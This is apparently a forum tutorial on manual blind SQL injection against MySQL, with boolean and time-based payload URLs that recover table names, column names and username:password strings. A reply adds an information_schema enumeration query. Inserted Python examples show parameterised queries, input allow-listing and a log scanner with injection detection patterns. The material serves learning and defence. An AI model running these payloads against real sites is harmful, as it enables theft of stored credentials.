
MySQL: Blind Injection steps - Manually

While preparing for an upcoming presentation, I came across Blind SQL Injection. I found the following steps helpful, and you might find them useful too.

There are 2 types of Blind SQL Injection:
1. Normal Blind => You get a TRUE/FALSE response depending on the outcome of the SQL query. The change is visible in the page.
2. Totally Blind => No change in the output for a TRUE or FALSE condition.

1. Normal Blind:
Vulnerable URL:

hxxp://site/page.php?id=1

TRUE Response:
hxxp://site/page.php?id=1 AND 1=1

FALSE Response:
hxxp://site/page.php?id=1 AND 1=2
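The reason `AND 1=1` and `AND 1=2` produce different pages is that `page.php` concatenates the `id` parameter straight into the SQL text, so the attacker's comparison becomes part of the WHERE clause. The following added example (not code from the original post) reproduces that oracle with an in-memory SQLite table standing in for the MySQL backend, and shows the two defences a developer applies: parameter binding, and an allow-list check on the parameter before it reaches the database. The `pages` table, its rows and the function names are constructed for the example.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the table behind page.php (assumption: MySQL
# semantics are close enough to SQLite for the WHERE-clause behaviour shown here).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    return con

def lookup_vulnerable(con, raw_id):
    # The untrusted parameter is concatenated into the statement text, so
    # "1 AND 1=1" and "1 AND 1=2" are parsed as SQL: this is the TRUE/FALSE oracle.
    sql = "SELECT title FROM pages WHERE id = " + raw_id
    return [row[0] for row in con.execute(sql)]

def lookup_bound(con, raw_id):
    # Parameter binding: the value travels separately from the statement and is
    # never parsed as SQL. Any probe is compared as a literal string against the
    # integer column, so every probe returns the same (empty) result and the
    # page no longer differs between TRUE and FALSE conditions.
    rows = con.execute("SELECT title FROM pages WHERE id = ?", (raw_id,)).fetchall()
    return [row[0] for row in rows]

def lookup_hardened(con, raw_id):
    # Binding plus an allow-list: ids are decimal digits only. Anything else is
    # rejected before a query is issued (the caller renders one generic error page),
    # which also gives the application a clean place to log the rejected value.
    if not re.fullmatch(r"\d+", raw_id):
        return None
    rows = con.execute("SELECT title FROM pages WHERE id = ?", (int(raw_id),)).fetchall()
    return [row[0] for row in rows]

if __name__ == "__main__":
    con = make_db()
    for probe in ("1", "1 AND 1=1", "1 AND 1=2"):
        print(f"{probe!r:14} vulnerable={lookup_vulnerable(con, probe)!s:10} "
              f"bound={lookup_bound(con, probe)!s:10} hardened={lookup_hardened(con, probe)}")
```

Run it and the vulnerable lookup answers `['Home']` for `1 AND 1=1` but `[]` for `1 AND 1=2`, which is exactly the difference the rest of this post exploits; the bound and hardened versions give the same answer for both probes.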

Check Version:
hxxp://site/page.php?id=1 AND substring(version(),1,1)=4 <-- FALSE response
hxxp://site/page.php?id=1 AND substring(version(),1,1)=5 <-- TRUE response
Database version is MySQL 5.x.x.

Table & Columns:
We need to guess the table and column names. For this, subselects must be supported.

Check subselect:
hxxp://site/page.php?id=1 AND (select 1)=1 <-- this should be TRUE -- subselect supported
Guessing Table name:
hxxp://site/page.php?id=1 AND (select 1 from admin limit 0,1)=1 <-- FALSE
hxxp://site/page.php?id=1 AND (select 1 from users limit 0,1)=1 <-- TRUE
Table found 'users'.

Here we are trying to get the 1st row as 1, so when the table exists the query returns 1 and the condition is TRUE. When the table is not there, the condition is FALSE because the query fails with an error that is not visible to us.

Guessing Columns:
hxxp://site/page.php?id=1 AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE
hxxp://site/page.php?id=1 AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE
Column 'password' found.

Here we are concatenating 1 with the value of the supplied column name and then checking the 1st character with substring(). If the column exists, concat() returns 1 followed by the password value of the 1st row, substring() pulls out the 1st character, which is '1', and comparing it with 1 gives TRUE. If the column does not exist, the query returns nothing, which makes the condition FALSE.

Data Mining:

We found table name as 'users' & columns as 'password' and 'username'.

hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>96 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>97 --> FALSE

This means 1st character is CHAR(97)='a'.

Here we first concatenate the username and password values of the 1st row (via LIMIT), which gives a string of the form 'username:password', then convert its 1st character to its ASCII code and compare that with a numeric value. If the response is TRUE, increase the number and check again until you get the first FALSE.

Now, to find the 2nd character, just increase the position argument of substring() and repeat the process.
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE

Second character is CHAR(100) = 'd'

To detect the end of the string, test the >0 condition: once the position is past the last character the response changes, so you know that you have reached the end.

2. Totally Blind:
As this type does not give any TRUE/FALSE response, we need to use time-based injection. Use IF() for the condition and BENCHMARK() for the time delay. These 2 can be used with UNION SELECT, but again finding the correct number of columns is a pain, as there is no direct method I know of.

Detecting Version:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null ---> delay of 5 secs (TRUE)
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD5(CHAR(1))),null),null ---> no delay (FALSE)
When the condition in IF() is TRUE, you can see a delay of a few seconds in the response compared to the one where the condition is FALSE.

Table and column guessing:
As described in 'Normal Blind', the same process can be followed here to guess the table and column names.

Table name guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select 1 from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if the table 'users' exists, no delay if it does not.

Column name Guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select substring(concat(1,pass),1,1) from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if the column 'pass' exists, no delay if it does not.

Getting Data:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(user,1,1)=CHAR(97),BENCHMARK(5000000, MD5(CHAR(1))),null),null FROM users limit 0,1

Delay if the first character of the 1st row of the 'user' column in the 'users' table is 'a', no delay if it is not.

This way we can mine data. As you have seen, this is time consuming. Tools like SQLMap are really good at this type of operation, but it is always good to know the basics before firing up any tool. You can use the DVWA Blind SQL Injection exercise at 'Medium' security to test these attacks.
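Every step in both sections leaves a recognisable trace in the web server's access log: the `AND 1=1`/`AND 1=2` pair, `substring()`/`ascii()` wrapped around a subselect, and `IF()` plus `BENCHMARK()` paired with a response that took seconds instead of milliseconds. The following added example, not part of the original post, scans constructed access-log lines for those signatures and flags any client that repeatedly probes the same parameter of the same page, which is the fingerprint of the character-by-character extraction described above. The log layout (combined format with a response-time-in-milliseconds field appended), the `SLOW_MS` threshold and the repeat threshold are assumptions; the log lines themselves are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines: combined log format with the response time in ms appended
# as the final field (assumption about the server's log configuration). Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 120
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=1%20AND%201=1 HTTP/1.1" 200 512 118
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1%20AND%201=2 HTTP/1.1" 200 301 115
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?id=1%20AND%20substring(version(),1,1)=5 HTTP/1.1" 200 512 121
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?id=1%20AND%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 512 119
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /page.php?id=1%20AND%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>90 HTTP/1.1" 200 512 117
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /page.php?id=1%20UNION%20SELECT%20IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null HTTP/1.1" 200 512 5210
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /page.php?id=2 HTTP/1.1" 200 640 110
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<ms>\d+)$')

# Boolean-blind signatures seen in the Normal Blind section: tautology/contradiction
# pairs, substring/ascii probes, a subselect used as an existence test, and the
# information_schema enumeration from the comment below the post.
BOOLEAN_SIGS = [
    ("tautology", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("substring-probe", re.compile(r"\b(ascii|substring|substr)\s*\(", re.I)),
    ("subselect", re.compile(r"\(\s*select\s+1\s+from\b", re.I)),
    ("schema-enum", re.compile(r"information_schema", re.I)),
]
# Time-based signatures from the Totally Blind section.
TIME_SIGS = [
    ("benchmark", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("conditional", re.compile(r"\bif\s*\(", re.I)),
]
SLOW_MS = 3000  # a time-based hit must also have been slow to answer (assumed threshold)

def analyse_line(line):
    """Return None for a benign line, else a dict naming the client, path and tagged parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qsl percent-decodes the values, so the regexes see the SQL as the server did.
    params = parse_qsl(url.query, keep_blank_values=True)
    hits = []
    for name, value in params:
        tags = [tag for tag, rx in BOOLEAN_SIGS if rx.search(value)]
        time_tags = [tag for tag, rx in TIME_SIGS if rx.search(value)]
        if time_tags and int(m["ms"]) >= SLOW_MS:
            time_tags.append("slow-response")
        if tags or time_tags:
            hits.append((name, tags + time_tags))
    if not hits:
        return None
    return {"ip": m["ip"], "path": url.path, "hits": hits}

def analyse_log(text, extraction_threshold=3):
    """Per-line findings plus the (client, path, parameter) triples probed repeatedly.

    One odd request may be a typo; several different probes of the same parameter
    from one client within a log window is how the extraction above looks from the
    server side, so those are reported separately as probable extraction."""
    findings = [f for f in (analyse_line(l) for l in text.splitlines()) if f]
    per_target = Counter((f["ip"], f["path"], name) for f in findings for name, _ in f["hits"])
    extraction = [key for key, count in per_target.items() if count >= extraction_threshold]
    return {"findings": findings, "probable_extraction": extraction}

if __name__ == "__main__":
    report = analyse_log(SAMPLE_LOG)
    for f in report["findings"]:
        print(f["ip"], f["path"], f["hits"])
    print("probable extraction:", report["probable_extraction"])
```

On the sample, the six probing requests are tagged, the `BENCHMARK()` request is additionally marked `slow-response`, and `10.0.0.9` is reported for repeatedly probing the `id` parameter of `/page.php`. The same logic applies to a WAF or SIEM rule; the response-time pairing matters because `IF()` and `BENCHMARK()` appear in legitimate SQL-heavy applications far less often than they appear in query strings.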

Hope this helps someone , someday, somewhere.
Good. However, since the MySQL version is 5.x.x, you can take the help of information_schema to enumerate rather than guessing table names.

It need not always be users. To help you in this case,

Code:
hxxp://site.com/page.php?id=1 and ascii(substring((select group_concat(table_name) from information_schema.columns where column_name like 0x257061737325),1,1))>0
Enumerates all the table names with a column containing the string "pass". Now, this should work even if the column name is pass/passwd/password and so on.
